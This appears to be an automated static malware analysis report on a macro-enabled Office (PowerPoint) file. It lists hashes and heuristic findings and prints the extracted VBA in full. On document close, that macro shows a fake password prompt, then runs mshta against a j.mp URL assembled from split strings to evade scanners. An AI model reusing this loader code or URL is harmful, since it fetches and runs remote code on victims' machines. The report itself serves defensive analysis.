Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 87fc3562db14b2e0…

MALICIOUS

Office (OOXML)

11.2 KB First seen: 2021-05-04
MD5: ade55084288b499955febcfcec6207d5 SHA-1: fc708dc0f1bf1cf34ffcadbe49c19d762eb74399 SHA-256: 87fc3562db14b2e061ed10e5cb113f4d60f670fa6a714a523fe5222e02c16a3a
150 Risk Score

Heuristics 5

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell _
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Shell _
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Auto_close()
  • VBA project signed with a self-signed certificate info OLE_VBA_SIGNATURE_SELF_SIGNED
    The VBA project is signed, but the signing certificate is self-signed (issuer equals subject) — no certificate authority vouches for the signer. Self-signed VBA signing is the common trick to make a macro project appear signed/trusted without a real publisher identity.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas🔏 Self-signedVBA project digital signature
Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 878 bytes
SHA-256: cb5b94549d4280b678f9a0c9ff2adefd88c051d6ce611cf6ca5f95c8fdff3324
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "dotcom1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Property Get computer() As String
computer = "m" + "s" + "h" + "t" + "a h"
End Property
Public Property Get computer2() As String
computer2 = "t" + "t" + "p" + ":" + "/" + "/" + "w" + "w" + "w"
End Property
Public Property Get computer3() As String
computer3 = ".j.mp/thistwentyoneneteen"
End Property



Attribute VB_Name = "Moon"
Dim mode As New dotcom1

Function p()
p = mode.computer + mode.computer2 + mode.computer3

End Function
Sub _
Auto_close()
: InputBox "Password!": MsgBox "ERROR! Password Incorrect!"
Call _
Shell _
(p)
End Sub
vbaProject_00.bin🔏 Self-signedVBA project digital signature
Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.		 vba-project OOXML VBA project: ppt/vbaProject.bin 19456 bytes
SHA-256: 0cf4d33c747775aa6d13160c879200d5743de77a117bed758286656e9642370a

Open this report in the interactive analyzer, or submit your own file for analysis.